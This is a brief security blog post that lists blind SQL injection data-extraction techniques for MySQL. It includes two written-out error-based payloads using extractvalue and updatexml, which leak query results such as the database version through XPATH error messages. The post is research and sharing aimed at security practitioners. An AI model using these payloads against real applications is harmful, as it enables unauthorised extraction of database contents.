In this quick post I want to collect some cool blind SQLi techniques I recently read about. I will keep this list updated as soon as I find new stuff. For me it is nice to have a list of these techniques online and a lot of visitors are interested in SQLi as well, so I thought I share it 😉 If you don’t know what blind SQLi is all about I recommend starting with this article about basic statistical approaches for efficient data extraction.
You can extract data more efficiently and thus safe requests and time by using the following techniques:
- extracting data with bit shifting
- extracting data with find_in_set
- extracting data with find_in_set and regexp (also here)
- extracting data through mysql errors
- extracting data through mysql errors (more reliable)
update 24.7.11: I just found out that the neat XML parsing function extractvalue includes invalid XML into error messages and can be used as a side channel for data extraction or conditional errors:
SELECT extractvalue(1,concat(0x2e,(SELECT @@version))); XPATH syntax error: '5.1.36-community-log' or SELECT updatexml(1,concat(0x2e,(SELECT @@version)),1); XPATH syntax error: '5.1.36-community-log'
(also published here)
If you know any other clever techniques please leave a comment.
Posted by Reiners 
Reiners' Weblog 